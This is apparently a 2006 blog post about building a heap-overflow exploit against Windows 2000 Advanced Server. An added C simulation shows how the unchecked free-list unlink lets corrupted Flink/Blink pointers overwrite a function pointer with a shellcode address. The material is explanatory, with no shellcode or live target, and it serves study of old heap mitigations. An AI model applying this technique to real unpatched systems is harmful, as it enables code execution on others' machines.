Aug. 24th, 2006

Now students, can anyone tell me what happens next?
[Large images (behind an LJ cut) not reproduced here]
I think that it'll help if I tell you that the heap structure at 0x00BFA8D8 was a free block, originally 0x005E 0x004D 0x01 0x10 0x00 0x00 with the forward and backwards pointers both set to 0x00230178, and I don't know why the fuck I can remember that without having to look it up, when I can't even remember my own postal address most of the time. (Maybe it's like lurene said, that all the really good reverse engineers/assembly coders are mentally broken in some way.) Anyway, 0x00230178 is the start of the free list (I think); it points back to 0x00BFA8E0.

Anyway, since this is Windows 2K Advanced Server SP0, I could just overwrite one of the function pointers in the PEB, or the TEB... or the SEH, wheee! [I'll explain later...] Although this particular buffer tends to move around a bit in memory, and I've been up all night trying to make the exploit [no you can't have a copy] more reliable. So I've been thinking of using Halvar's trick of building a VirtAlloc structure in the buffer underneath the free block, to get an extra DWORD copy. And with two writes, I think that would be enough to make this reliable, because the pointer to the free block exists in the segment table at 0x00B70027 (I think it was), which I know the address of. And worst case I could leave the original Forward pointer intact, because that does point to the FreeTable entry for itself. (In other words, if I can take the DWORD located at 0x00B70027 -- which points to data from the overflowed buffer, and write it to your favorite function pointer, then the shellcode will be jumped to exactly.)

Maybe.

Either that, or I'll just have to manipulate the heap list itself in such a way that I can control where the next buffer will be written (to an address of my choice), write the shellcode there, and then do the overflow again to put this known address in some known location that will jump to it.
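The free-list unlink that the whole plan above leans on, as an added example that is not part of the original post and not the author's exploit: a small 32-bit address window is modelled as a byte array, the free block is laid out with the header bytes and the chunk address given above (so its LIST_ENTRY sits at 0x00BFA8E0), and the 8-byte header is left intact while Flink/Blink are replaced by the overflow. The free-list head, the "function pointer" slot standing in for a PEB/TEB/SEH entry, and the shellcode address are constructed stand-ins (the real head in the post is 0x00230178), and the unlink is the unchecked RemoveEntryList of the pre-XP SP2 heap.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Simulated Windows 2000 heap free-list unlink ("write-4") primitive.
 * Added example, not the post author's exploit.  A small 32-bit address
 * window is modelled as a byte array; addresses are offsets into it.
 * The chunk header bytes and the chunk address come from the post; every
 * other address below is a constructed stand-in.
 */

#define WIN_BASE   0x00BFA000u          /* constructed window base */
#define WIN_SIZE   0x2000u
#define CHUNK      0x00BFA8D8u          /* HEAP_ENTRY of the free block (from the post) */
#define LIST_ENTRY (CHUNK + 8)          /* LIST_ENTRY {Flink, Blink} follows the 8-byte header */
#define FREE_HEAD  0x00BFA010u          /* stand-in for the FreeList head (0x00230178 in the post) */
#define FUNC_PTR   0x00BFA100u          /* stand-in for a PEB/TEB/SEH function-pointer slot */
#define SHELLCODE  0x00BFA900u          /* where the overflowed buffer's shellcode would sit */

static uint8_t mem[WIN_SIZE];

static int in_window(uint32_t a) { return a >= WIN_BASE && a - WIN_BASE + 4 <= WIN_SIZE; }

static uint32_t rd32(uint32_t a) {
    const uint8_t *p = mem + (a - WIN_BASE);
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint32_t a, uint32_t v) {
    uint8_t *p = mem + (a - WIN_BASE);
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = v >> 24;
}

/* Lay out the free block exactly as the post records it: Size 0x005E,
 * PreviousSize 0x004D, SegmentIndex 0x01, Flags 0x10, UnusedBytes 0,
 * SmallTagIndex 0, then Flink and Blink both pointing at the list head,
 * whose own Flink/Blink point back at the chunk's LIST_ENTRY (0x00BFA8E0). */
static void setup_free_chunk(void) {
    static const uint8_t hdr[8] = {0x5E, 0x00, 0x4D, 0x00, 0x01, 0x10, 0x00, 0x00};
    memset(mem, 0, sizeof mem);
    memcpy(mem + (CHUNK - WIN_BASE), hdr, sizeof hdr);
    wr32(LIST_ENTRY,     FREE_HEAD);
    wr32(LIST_ENTRY + 4, FREE_HEAD);
    wr32(FREE_HEAD,      LIST_ENTRY);
    wr32(FREE_HEAD + 4,  LIST_ENTRY);
    wr32(FUNC_PTR, 0x77E80000u);   /* constructed: some legitimate handler address */
}

/* RemoveEntryList as the pre-XP SP2 heap does it: no check that
 * Flink->Blink == Blink->Flink == Entry, so both writes trust the chunk. */
static int unlink_free_entry(uint32_t entry) {
    uint32_t flink = rd32(entry), blink = rd32(entry + 4);
    if (!in_window(flink + 4) || !in_window(blink)) return -1;  /* would fault outside the model */
    wr32(flink + 4, blink);   /* Flink->Blink = Blink : the controlled 4-byte write */
    wr32(blink, flink);       /* Blink->Flink = Flink : the side-effect write */
    return 0;
}

/* An overflow from the preceding buffer that reaches the header keeps the
 * eight header bytes sane and replaces Flink/Blink with attacker values. */
static void overflow_into_header(uint32_t flink, uint32_t blink) {
    wr32(LIST_ENTRY, flink);
    wr32(LIST_ENTRY + 4, blink);
}

/* Returns what FUNC_PTR holds after the heap unlinks the corrupted block. */
uint32_t demo_write4(void) {
    setup_free_chunk();
    overflow_into_header(FUNC_PTR - 4, SHELLCODE);   /* Flink+4 == FUNC_PTR, Blink == payload */
    if (unlink_free_entry(LIST_ENTRY) != 0) return 0;
    return rd32(FUNC_PTR);
}

/* The side-effect write lands at SHELLCODE+0: its first DWORD becomes
 * FUNC_PTR-4, so real shellcode starts with a short jump over those bytes. */
uint32_t demo_clobbered_shellcode_dword(void) {
    (void)demo_write4();
    return rd32(SHELLCODE);
}

int main(void) {
    printf("function pointer after unlink: 0x%08X (want 0x%08X)\n", demo_write4(), SHELLCODE);
    printf("first shellcode DWORD clobbered to: 0x%08X\n", demo_clobbered_shellcode_dword());
    return 0;
}
```

Two things to take from running it: the unlink gives exactly one attacker-chosen DWORD written to one attacker-chosen address (the post's "extra DWORD copy" from a second fake structure is a second such write, not something this block models), and the reverse write always trashes the first four bytes at the Blink address, which is why shellcode reached this way conventionally opens with a short jump. XP SP2 and later refuse the unlink when Flink->Blink and Blink->Flink do not both point back at the entry.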
